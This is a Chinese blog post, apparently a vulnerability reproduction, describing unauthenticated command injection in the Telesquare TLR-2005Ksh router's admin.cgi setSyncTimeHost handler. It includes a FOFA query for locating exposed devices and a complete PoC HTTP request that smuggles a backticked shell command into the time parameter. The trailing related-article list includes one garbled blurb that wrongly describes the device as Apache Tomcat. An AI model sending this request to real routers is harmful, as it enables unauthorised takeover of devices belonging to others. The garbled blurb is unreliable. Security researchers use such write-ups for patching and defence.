Telesquare TLR-2005Ksh 路由器 RCE漏洞复现

最新推荐文章于 2024-10-16 18:37:25 发布
最新推荐文章于 2024-10-16 18:37:25 发布
阅读量1.2k 收藏 11
点赞数 8
分类专栏: 漏洞复现 文章标签: 网络 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134636447
版权
本文介绍了韩国Telesquare公司的TLR-2005Ksh路由器存在的安全漏洞,该漏洞允许未授权攻击者通过setSyncTimeHost命令执行任意代码,获取服务器权限。复现环境为FOFA标记的TELESQUARE-TLR-2005KSH设备。修复方案包括限制接口访问权限和更新到安全版本。
摘要由CSDN通过智能技术生成

0x01 产品简介

 Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款 Sk 电讯 Lte 路由器。

0x02 漏洞概述

  Telesquare TLR-2005Ksh存在安全漏洞,未经授权的攻击者可通过setSyncTimeHost执行任意命令获取服务器权限。

0x03 复现环境

FOFA:app="TELESQUARE-TLR-2005KSH"

0x04 漏洞复现 

PoC

GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`id>1.txt` HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)
0xSec
04-07 1128
Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
CVE-2024-29269:Telesquare TLR-2005KSH路由器RCE漏洞复现 [附POC]
薛定谔嘚喵博客
04-11 325
Telesquare Tlr-2005Ksh是韩国Telesquare公司的Sk Telecom Lte路由器Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
Telesquare TLR-2005KSH路由器未经授权的远程命令执行漏洞(CVE-2024-29269)
wan___she__pi的博客
04-09 466
Telesquare TLR-2005Ksh版本1.0.0和1.1.4存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经cmd参数授权的情况下执行系统命令,并获取服务器权限。Telesquare TLR-2005KSH是韩国Telesquare公司的一款路由器
Goby 漏洞更新 |Telesquare TLR-2005Ksh 路由器 getUsernamePassword 信息泄露漏洞
m0_46699477的博客
05-12 306
Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款 Sk 电讯 Lte 路由器Telesquare TLR-2005Ksh存在安全漏洞,攻击者可通过未授权getUsernamePassword获取用户名密码等敏感信息。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1022
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
漏洞复现telesquare tlr2005 getusernamepassword 信息泄露漏洞
qq_67810151的博客
03-11 418
Telesquare Tlr-2005Ksh存在信息泄露漏洞,未授权得攻击者可以通过该漏洞获取管理员账号密码,从而登录后台。
Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)(含批量验证poc)
weixin_43567873的博客
04-08 242
Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)(含批量验证poc)
漏洞复习】​Telesquare TLR-2005Ksh存在远程命令执行漏洞CVE-2024-29269
失心少年
04-20 121
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!Telesquare TLR-2005Ksh 1.0.0版本和1.1.4版本存在安全漏洞,该漏洞源于允许攻击者通过Cmd参数运行任意系统命令。漏洞链接:http://127.0.0.1/cgi-bin/admin.cgi?CNNVD编号:CNNVD-202404-1617。
Goby 漏洞更新 |Telesquare TLR-2005Ksh 路由器 setSyncTimeHost 命令执行漏洞
m0_46699477的博客
05-12 367
Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款 Sk 电讯 Lte 路由器Telesquare TLR-2005Ksh存在安全漏洞,攻击者可通过setSyncTimeHost执行任意命令获取服务器权限。
漏洞复现Telesquare admin.cgi 远程代码执行漏洞(CVE-2024-29269)
qq_67810151的博客
04-07 520
Telesquare TLR-2005Ksh版本1.0.0和1.1.4存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经cmd参数授权的情况下执行系统命令,并获取服务器权限。
各种路由器的默认密码
09-06
各种路由器的默认密码 路由器默认密码  Manufacturer Product Revision Protocol User ID Password Access Level Comment 3COM CellPlex 7000 Telnet tech tech 3COM CoreBuilder 7000/6000/3500/2500 Telnet debug synnet 3COM CoreBuilder 7000/6000/3500/2500 Telnet tech tech 3COM HiPerARC v4.1.x Telnet adm (none) 3COM LANplex 2500 Telnet debug synnet 3COM LANplex 2500 Telnet tech tech 3COM LinkSwitch 2000/2700 Telnet tech tech 3COM NetBuilder SNMP ANYCOM snmp-read 3COM NetBuilder SNMP ILMI snmp-read 3COM Office Connect ISDN Routers 5x0 Telnet n/a PASSWORD Admin 3COM SuperStack II Switch 2200 Telnet debug synnet 3COM SuperStack II Switch 2700 Telnet tech tech 3COM Telnet adm (none) 3COM Telnet admin synnet 3COM Telnet manager manager 3COM Telnet monitor monitor 3COM Telnet read synnet 3COM Telnet security security 3COM Telnet write synnet 3COM AirConnect Access Point 01.50-01 Multi n/a (none) Admin 3com OfficeConnect 812 ADSL Multi adminttd adminttd Admin 3com router Multi n/a (none) Admin 更多需要请下载。。。
漏洞复现】京师心智心理健康测评系统MyReport.ashx存在敏感信息泄露
失心少年
03-21 267
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!漏洞链接:http://127.0.0.1/FunctionModular/PersonalReport/Ajax/MyReport.ashx?
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 752
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
WireShark过滤器
ngczx的博客
10-11 696
Wireshark的过滤器规则可以分为**捕获过滤器**和**显示过滤器**,这两种过滤器有不同的编写规则
Linux系统性能调优技巧详解
运维人生
10-13 586
Linux系统性能调优是一个复杂而持续的过程,需要综合考虑硬件、软件、内核参数、进程管理等多个方面。通过合理的调优措施和持续的监控调整,可以显著提升Linux系统的运行效率和稳定性,为业务提供强有力的支持。性能调优是一个持续的过程,需要不断地监控、分析和调整,以适应不断变化的工作负载和系统环境。希望本文的介绍和代码示例能够帮助您在Linux系统性能调优方面取得更好的效果。
找到占用5601端口的进程ID
m0_46695127的博客
10-13 273
找到占用5601端口的进程ID
天锐绿盾VS Ping32数据安全新选择,用户体验分享
最新发布
weixin_44264342的博客
10-16 327
而Ping32则以其创新的技术和灵活的功能配置,尤其受到技术爱好者和大型企业的青睐。在网络安全的选择上,用户应根据自身的实际需求和技术水平,选择最合适的安全软件,为数字生活提供可靠的保护。相比之下,Ping32虽然功能丰富,但由于其灵活的设置选项,对于一些初学者来说,可能需要一定的时间来熟悉和掌握,同时支持专业的技术团队讲解。尽管如此,Ping32的高级功能能够为有经验的用户提供更高的自定义自由度。在操作便捷性上,天锐绿盾的界面设计简洁直观,用户可以轻松完成各项设置,几乎无需任何技术背景就能顺利使用。
OSI七层协议
hexadecimal_001的博客
10-14 608
OSI(Open System Interconnection)七层协议,即开放式系统互联参考模型,是一个由国际标准化组织(ISO)提出的用于描述计算机网络中通信的结构和功能的理论模型。它将网络通信过程分为七个层次,每个层次都有特定的功能和协议。
H3C Vlan基础配置实验
M建的博客
10-12 318
Vlan基础配置实验
POC-亚姆-TLR-2005KSH-CVE-2021-45428
07-28
这是一个IT类问题,具体来说是一个安全漏洞的命名。POC代表"Proof of Concept",亚姆是指Apache的一个Web服务器,TLR是指Tomcat的日志记录器,2005KSH是指Apache Tomcat 5.5.20版本,CVE-2021-45428是指该版本中的一个已知漏洞。该漏洞可能允许攻击者通过精心构造的请求来执行远程代码。建议及时更新Tomcat以修复漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值